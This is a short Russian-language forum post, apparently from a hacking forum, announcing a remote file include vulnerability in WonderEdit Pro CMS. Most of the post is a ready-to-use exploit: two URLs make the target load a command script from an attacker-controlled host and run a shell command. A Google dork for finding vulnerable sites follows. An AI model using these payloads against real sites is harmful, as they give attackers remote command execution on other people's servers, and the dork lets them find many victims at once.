• XSS.stack #1 – первый литературный журнал от юзеров форума

Web WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities
Пример/эксплоит:
Код:
http://[target]/[path]/template/rwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[path]/template/gwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls
Google dork: "powered by WonderEdit Pro"
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх